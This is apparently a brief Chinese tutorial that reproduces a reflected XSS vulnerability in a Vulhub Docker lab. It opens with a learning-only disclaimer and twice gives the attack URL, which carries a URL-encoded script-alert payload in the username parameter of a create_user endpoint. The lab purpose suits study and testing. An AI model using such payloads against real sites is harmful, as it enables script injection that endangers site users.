声明
严禁读者利用以上介绍知识点对网站进行非法操作 , 本文仅用于技术交流和学习 , 如果您利用文章中介绍的知识对他人造成损失 , 后果由您自行承担 , 如果您不能同意该约定 , 请您务必不要阅读该文章 , 感谢您的配合 !
目录
一、环境搭建:
用Kali的docker启动Vulhub
访问http://192.168.xxx.xxx:8000/
二、攻击复现:
Xss注入攻击
http://192.168.xxx.xxx:8000/create_user/?username=%3Cscript%3Ealert(123)%3C/script%3E
再次注入
http://192.168.xxx.xxx:8000/create_user/?username=%3Cscript%3Ealert(123)%3C/script%3E
攻击成功